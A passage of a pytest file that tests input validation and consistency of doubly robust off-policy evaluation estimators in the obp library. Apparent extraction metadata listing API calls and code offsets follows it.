"reward must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
None,
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"pscore must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
None,
"estimated_rewards_by_reg_model must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.float32),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action elements must be non-negative integers",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64) - 1,
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action elements must be non-negative integers",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
"4",
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros((3, 2), dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action must be 1-dimensional",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64) + 8,
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action elements must be smaller than the second dimension of action_dist",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
"4",
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"reward must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros((3, 2), dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"reward must be 1-dimensional",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(4, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action and reward must be the same size.",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
"4",
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"pscore must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones((5, 3)),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"pscore must be 1-dimensional",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(4),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action, reward, and pscore must be the same size.",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.from_numpy(np.arange(5)),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"pscore must be positive",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 2)),
"estimated_rewards_by_reg_model.shape must be the same as action_dist.shape",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
"4",
"estimated_rewards_by_reg_model must be Tensor",
),
]
@pytest.mark.parametrize(
"action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description",
invalid_input_tensor_of_dr,
)
def test_dr_using_invalid_input_tensor_data(
action_dist: torch.Tensor,
action: torch.Tensor,
reward: torch.Tensor,
pscore: torch.Tensor,
position: torch.Tensor,
estimated_rewards_by_reg_model: torch.Tensor,
description: str,
) -> None:
# estimate_intervals function raises ValueError of all estimators
for estimator in [dr, sndr]:
with pytest.raises(ValueError, match=f"{description}*"):
_ = estimator.estimate_policy_value_tensor(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
# switch-dr
invalid_input_of_switch = [
("a", "switching hyperparameter must be float or integer"),
(-1.0, "switching hyperparameter must be larger than or equal to zero"),
(np.nan, "switching hyperparameter must not be nan"),
]
@pytest.mark.parametrize(
"tau, description",
invalid_input_of_switch,
)
def test_switch_using_invalid_input_data(tau: float, description: str) -> None:
with pytest.raises(ValueError, match=f"{description}*"):
_ = SwitchDoublyRobust(tau=tau)
valid_input_of_switch = [
(3.0, "float tau"),
(2, "integer tau"),
]
@pytest.mark.parametrize(
"tau, description",
valid_input_of_switch,
)
def test_switch_using_valid_input_data(tau: float, description: str) -> None:
_ = SwitchDoublyRobust(tau=tau)
# dr-os
invalid_input_of_shrinkage = [
("a", "shrinkage hyperparameter must be float or integer"),
(-1.0, "shrinkage hyperparameter must be larger than or equal to zero"),
(np.nan, "shrinkage hyperparameter must not be nan"),
]
@pytest.mark.parametrize(
"lambda_, description",
invalid_input_of_shrinkage,
)
def test_shrinkage_using_invalid_input_data(lambda_: float, description: str) -> None:
with pytest.raises(ValueError, match=f"{description}*"):
_ = DoublyRobustWithShrinkage(lambda_=lambda_)
valid_input_of_shrinkage = [
(3.0, "float lambda_"),
(2, "integer lambda_"),
]
@pytest.mark.parametrize(
"lambda_, description",
valid_input_of_shrinkage,
)
def test_shrinkage_using_valid_input_data(lambda_: float, description: str) -> None:
_ = DoublyRobustWithShrinkage(lambda_=lambda_)
# dr variants
valid_input_of_dr_variants = [
(
generate_action_dist(5, 4, 3),
np.random.choice(4, size=5),
np.zeros(5, dtype=int),
np.random.uniform(low=0.5, high=1.0, size=5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
0.5,
"all argumnents are given and len_list > 1",
)
]
@pytest.mark.parametrize(
"action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description",
valid_input_of_dr_variants,
)
def test_dr_variants_using_valid_input_data(
action_dist: np.ndarray,
action: np.ndarray,
reward: np.ndarray,
pscore: np.ndarray,
position: np.ndarray,
estimated_rewards_by_reg_model: np.ndarray,
hyperparameter: float,
description: str,
) -> None:
# check dr variants
switch_dr = SwitchDoublyRobust(tau=hyperparameter)
dr_os = DoublyRobustWithShrinkage(lambda_=hyperparameter)
for estimator in [switch_dr, dr_os]:
est = estimator.estimate_policy_value(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
assert est == 0.0, f"policy value must be 0, but {est}"
# dr variants
valid_input_tensor_of_dr_variants = [
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.from_numpy(np.random.choice(4, size=5)),
torch.zeros(5, dtype=torch.int64),
torch.from_numpy(np.random.uniform(low=0.5, high=1.0, size=5)),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
0.5,
"all argumnents are given and len_list > 1",
)
]
@pytest.mark.parametrize(
"action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description",
valid_input_tensor_of_dr_variants,
)
def test_dr_variants_using_valid_input_tensor_data(
action_dist: torch.Tensor,
action: torch.Tensor,
reward: torch.Tensor,
pscore: torch.Tensor,
position: torch.Tensor,
estimated_rewards_by_reg_model: torch.Tensor,
hyperparameter: float,
description: str,
) -> None:
# check dr variants
dr_os = DoublyRobustWithShrinkage(lambda_=hyperparameter)
for estimator in [dr_os]:
est = estimator.estimate_policy_value_tensor(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
assert est.item() == 0.0, f"policy value must be 0, but {est.item()}"
def test_dr_using_random_evaluation_policy(
synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray
) -> None:
"""
Test the format of dr variants using synthetic bandit data and random evaluation policy
"""
expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis]
action_dist = random_action_dist
# prepare input dict
input_dict = {
k: v
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_dict["action_dist"] = action_dist
input_dict["estimated_rewards_by_reg_model"] = expected_reward
    # dr estimators require all arguments
for estimator in dr_estimators:
estimated_policy_value = estimator.estimate_policy_value(**input_dict)
assert isinstance(
estimated_policy_value, float
), f"invalid type response: {estimator}"
# remove necessary keys
del input_dict["reward"]
del input_dict["pscore"]
del input_dict["action"]
del input_dict["estimated_rewards_by_reg_model"]
for estimator in dr_estimators:
with pytest.raises(
TypeError,
match=re.escape(
"estimate_policy_value() missing 4 required positional arguments: 'reward', 'action', 'pscore', and 'estimated_rewards_by_reg_model'"
),
):
_ = estimator.estimate_policy_value(**input_dict)
# prepare input dict
input_tensor_dict = {
k: v if v is None else torch.from_numpy(v)
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_tensor_dict["action_dist"] = torch.from_numpy(action_dist)
input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy(
expected_reward
)
    # dr estimators require all arguments
for estimator in dr_estimators:
if estimator.estimator_name == "switch-dr":
with pytest.raises(
NotImplementedError,
match=re.escape(
"This is not implemented for Swtich-DR because it is indifferentiable."
),
):
_ = estimator.estimate_policy_value_tensor(**input_tensor_dict)
else:
estimated_policy_value = estimator.estimate_policy_value_tensor(
**input_tensor_dict
)
assert isinstance(
estimated_policy_value, torch.Tensor
), f"invalid type response: {estimator}"
# remove necessary keys
del input_tensor_dict["reward"]
del input_tensor_dict["pscore"]
del input_tensor_dict["action"]
del input_tensor_dict["estimated_rewards_by_reg_model"]
for estimator in dr_estimators:
if estimator.estimator_name == "switch-dr":
with pytest.raises(
NotImplementedError,
match=re.escape(
"This is not implemented for Swtich-DR because it is indifferentiable."
),
):
_ = estimator.estimate_policy_value_tensor(**input_tensor_dict)
else:
with pytest.raises(
TypeError,
match=re.escape(
"estimate_policy_value_tensor() missing 4 required positional arguments: 'reward', 'action', 'pscore', and 'estimated_rewards_by_reg_model'"
),
):
_ = estimator.estimate_policy_value_tensor(**input_tensor_dict)
def test_boundedness_of_sndr_using_random_evaluation_policy(
synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray
) -> None:
"""
Test the boundedness of sndr estimators using synthetic bandit data and random evaluation policy
"""
expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis]
action_dist = random_action_dist
# prepare input dict
input_dict = {
k: v
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_dict["action_dist"] = action_dist
input_dict["estimated_rewards_by_reg_model"] = expected_reward
# make pscore too small (to check the boundedness of sndr)
input_dict["pscore"] = input_dict["pscore"] ** 3
estimated_policy_value = sndr.estimate_policy_value(**input_dict)
assert (
estimated_policy_value <= 2
), f"estimated policy value of sndr should be smaller than or equal to 2 (because of its 2-boundedness), but the value is: {estimated_policy_value}"
# prepare input dict
input_tensor_dict = {
k: v if v is None else torch.from_numpy(v)
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_tensor_dict["action_dist"] = torch.from_numpy(action_dist)
input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy(
expected_reward
)
# make pscore too small (to check the boundedness of sndr)
input_tensor_dict["pscore"] = input_tensor_dict["pscore"] ** 3
estimated_policy_value = sndr.estimate_policy_value_tensor(**input_tensor_dict)
assert (
estimated_policy_value.item() <= 2
), f"estimated policy value of sndr should be smaller than or equal to 2 (because of its 2-boundedness), but the value is: {estimated_policy_value.item()}"
def test_dr_shrinkage_using_random_evaluation_policy(
synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray
) -> None:
"""
Test the dr shrinkage estimators using synthetic bandit data and random evaluation policy
"""
expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis]
action_dist = random_action_dist
# prepare input dict
input_dict = {
k: v
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_dict["action_dist"] = action_dist
input_dict["estimated_rewards_by_reg_model"] = expected_reward
dm_value = dm.estimate_policy_value(**input_dict)
dr_value = dr.estimate_policy_value(**input_dict)
dr_shrink_0_value = dr_shrink_0.estimate_policy_value(**input_dict)
dr_shrink_max_value = dr_shrink_max.estimate_policy_value(**input_dict)
assert (
dm_value == dr_shrink_0_value
), "DoublyRobustWithShrinkage (lambda=0) should be the same as DirectMethod"
assert (
np.abs(dr_value - dr_shrink_max_value) < 1e-5
), "DoublyRobustWithShrinkage (lambda=inf) should be almost the same as DoublyRobust"
# prepare input dict
input_tensor_dict = {
k: v if v is None else torch.from_numpy(v)
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_tensor_dict["action_dist"] = torch.from_numpy(action_dist)
input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy(
expected_reward
)
dm_value = dm.estimate_policy_value_tensor(**input_tensor_dict)
dr_value = dr.estimate_policy_value_tensor(**input_tensor_dict)
dr_shrink_0_value = dr_shrink_0.estimate_policy_value_tensor(**input_tensor_dict)
dr_shrink_max_value = dr_shrink_max.estimate_policy_value_tensor(
**input_tensor_dict
)
assert (
dm_value.item() == dr_shrink_0_value.item()
), "DoublyRobustWithShrinkage (lambda=0) should be the same as DirectMethod"
assert (
np.abs(dr_value.item() - dr_shrink_max_value.item()) < 1e-5
), "DoublyRobustWithShrinkage (lambda=inf) should be almost the same as DoublyRobust"
def test_switch_dr_using_random_evaluation_policy(
synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray
) -> None:
"""
Test the switch_dr using synthetic bandit data and random evaluation policy
"""
expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis]
action_dist = random_action_dist
# prepare input dict
input_dict = {
k: v
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_dict["action_dist"] = action_dist
input_dict["estimated_rewards_by_reg_model"] = expected_reward
dm_value = dm.estimate_policy_value(**input_dict)
dr_value = dr.estimate_policy_value(**input_dict)
switch_dr_0_value = switch_dr_0.estimate_policy_value(**input_dict)
switch_dr_max_value = switch_dr_max.estimate_policy_value(**input_dict)
assert (
dm_value == switch_dr_0_value
), "SwitchDR (tau=0) should be the same as DirectMethod"
assert (
dr_value == switch_dr_max_value
), "SwitchDR (tau=1e10) should be the same as DoublyRobust"
|
[
"torch.ones",
"numpy.random.uniform",
"obp.ope.SelfNormalizedDoublyRobust",
"numpy.abs",
"conftest.generate_action_dist",
"numpy.zeros",
"numpy.ones",
"re.escape",
"obp.ope.DoublyRobustWithShrinkage",
"pytest.raises",
"obp.ope.SwitchDoublyRobust",
"numpy.arange",
"numpy.random.choice",
"torch.zeros",
"pytest.mark.parametrize",
"obp.ope.DoublyRobust",
"obp.ope.DirectMethod",
"torch.from_numpy"
] |
[((310, 324), 'obp.ope.DirectMethod', 'DirectMethod', ([], {}), '()\n', (322, 324), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((330, 344), 'obp.ope.DoublyRobust', 'DoublyRobust', ([], {}), '()\n', (342, 344), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((359, 397), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': '(0.0)'}), '(lambda_=0.0)\n', (384, 397), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((414, 462), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': '(10000000000.0)'}), '(lambda_=10000000000.0)\n', (439, 462), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((461, 489), 'obp.ope.SelfNormalizedDoublyRobust', 'SelfNormalizedDoublyRobust', ([], {}), '()\n', (487, 489), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((504, 531), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': '(0.0)'}), '(tau=0.0)\n', (522, 531), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((548, 585), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': '(10000000000.0)'}), '(tau=10000000000.0)\n', (566, 585), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((5200, 5348), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description"""', 'invalid_input_of_dr'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description'\n , invalid_input_of_dr)\n", (5223, 5348), False, 'import pytest\n'), ((12126, 12281), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description"""', 'invalid_input_tensor_of_dr'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description'\n , invalid_input_tensor_of_dr)\n", (12149, 12281), False, 'import pytest\n'), ((13281, 13349), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""tau, description"""', 'invalid_input_of_switch'], {}), "('tau, description', invalid_input_of_switch)\n", (13304, 13349), False, 'import pytest\n'), ((13623, 13689), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""tau, description"""', 'valid_input_of_switch'], {}), "('tau, description', valid_input_of_switch)\n", (13646, 13689), False, 'import pytest\n'), ((14060, 14135), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""lambda_, description"""', 'invalid_input_of_shrinkage'], {}), "('lambda_, description', invalid_input_of_shrinkage)\n", (14083, 14135), False, 'import pytest\n'), ((14442, 14515), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""lambda_, description"""', 'valid_input_of_shrinkage'], {}), "('lambda_, description', valid_input_of_shrinkage)\n", (14465, 14515), False, 'import pytest\n'), ((15021, 15192), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, 
pscore, position, estimated_rewards_by_reg_model, hyperparameter, description"""', 'valid_input_of_dr_variants'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description'\n , valid_input_of_dr_variants)\n", (15044, 15192), False, 'import pytest\n'), ((16452, 16630), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description"""', 'valid_input_tensor_of_dr_variants'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description'\n , valid_input_tensor_of_dr_variants)\n", (16475, 16630), False, 'import pytest\n'), ((13787, 13814), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'tau'}), '(tau=tau)\n', (13805, 13814), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14620, 14662), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'lambda_'}), '(lambda_=lambda_)\n', (14645, 14662), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((15514, 15552), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'hyperparameter'}), '(tau=hyperparameter)\n', (15532, 15552), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((15565, 15614), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'hyperparameter'}), '(lambda_=hyperparameter)\n', (15590, 15614), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((16967, 17016), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'hyperparameter'}), '(lambda_=hyperparameter)\n', (16992, 17016), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((19122, 19151), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (19138, 19151), False, 'import torch\n'), ((19210, 19243), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (19226, 19243), False, 'import torch\n'), ((22273, 22302), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (22289, 22302), False, 'import torch\n'), ((22361, 22394), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (22377, 22394), False, 'import torch\n'), ((24309, 24338), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (24325, 24338), False, 'import torch\n'), ((24397, 24430), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (24413, 24430), False, 'import torch\n'), ((792, 821), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (812, 821), False, 'from conftest import generate_action_dist\n'), ((845, 867), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (853, 867), True, 'import numpy as np\n'), ((877, 887), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (884, 887), True, 'import numpy as np\n'), ((897, 924), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, 
size=5)\n', (913, 924), True, 'import numpy as np\n'), ((934, 953), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (942, 953), True, 'import numpy as np\n'), ((1010, 1039), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1030, 1039), False, 'from conftest import generate_action_dist\n'), ((1049, 1071), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1057, 1071), True, 'import numpy as np\n'), ((1095, 1105), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1102, 1105), True, 'import numpy as np\n'), ((1115, 1142), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1131, 1142), True, 'import numpy as np\n'), ((1152, 1171), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1160, 1171), True, 'import numpy as np\n'), ((1228, 1257), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1248, 1257), False, 'from conftest import generate_action_dist\n'), ((1267, 1289), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1275, 1289), True, 'import numpy as np\n'), ((1299, 1321), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1307, 1321), True, 'import numpy as np\n'), ((1345, 1372), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1361, 1372), True, 'import numpy as np\n'), ((1382, 1401), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1390, 1401), True, 'import numpy as np\n'), ((1458, 1487), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1478, 1487), False, 'from conftest import generate_action_dist\n'), ((1497, 1519), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1505, 1519), True, 'import numpy as np\n'), ((1529, 1551), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1537, 1551), True, 'import numpy as np\n'), ((1561, 1571), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1568, 1571), True, 'import numpy as np\n'), ((1581, 1608), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1597, 1608), True, 'import numpy as np\n'), ((1703, 1732), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1723, 1732), False, 'from conftest import generate_action_dist\n'), ((1742, 1766), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'float'}), '(5, dtype=float)\n', (1750, 1766), True, 'import numpy as np\n'), ((1776, 1798), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1784, 1798), True, 'import numpy as np\n'), ((1808, 1818), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1815, 1818), True, 'import numpy as np\n'), ((1828, 1855), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1844, 1855), True, 'import numpy as np\n'), ((1865, 1884), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1873, 1884), True, 'import numpy as np\n'), ((1964, 1993), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1984, 1993), False, 'from conftest import generate_action_dist\n'), ((2039, 2061), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2047, 2061), True, 'import numpy as np\n'), ((2071, 2081), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', 
(2078, 2081), True, 'import numpy as np\n'), ((2091, 2118), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2107, 2118), True, 'import numpy as np\n'), ((2128, 2147), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2136, 2147), True, 'import numpy as np\n'), ((2227, 2256), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2247, 2256), False, 'from conftest import generate_action_dist\n'), ((2279, 2301), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2287, 2301), True, 'import numpy as np\n'), ((2311, 2321), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2318, 2321), True, 'import numpy as np\n'), ((2331, 2358), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2347, 2358), True, 'import numpy as np\n'), ((2368, 2387), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2376, 2387), True, 'import numpy as np\n'), ((2444, 2473), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2464, 2473), False, 'from conftest import generate_action_dist\n'), ((2483, 2510), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'int'}), '((3, 2), dtype=int)\n', (2491, 2510), True, 'import numpy as np\n'), ((2520, 2542), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2528, 2542), True, 'import numpy as np\n'), ((2552, 2562), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2559, 2562), True, 'import numpy as np\n'), ((2572, 2599), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2588, 2599), True, 'import numpy as np\n'), ((2609, 2628), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2617, 2628), True, 'import numpy as np\n'), ((2691, 2720), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2711, 2720), False, 'from conftest import generate_action_dist\n'), ((2766, 2788), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2774, 2788), True, 'import numpy as np\n'), ((2798, 2808), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2805, 2808), True, 'import numpy as np\n'), ((2818, 2845), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, 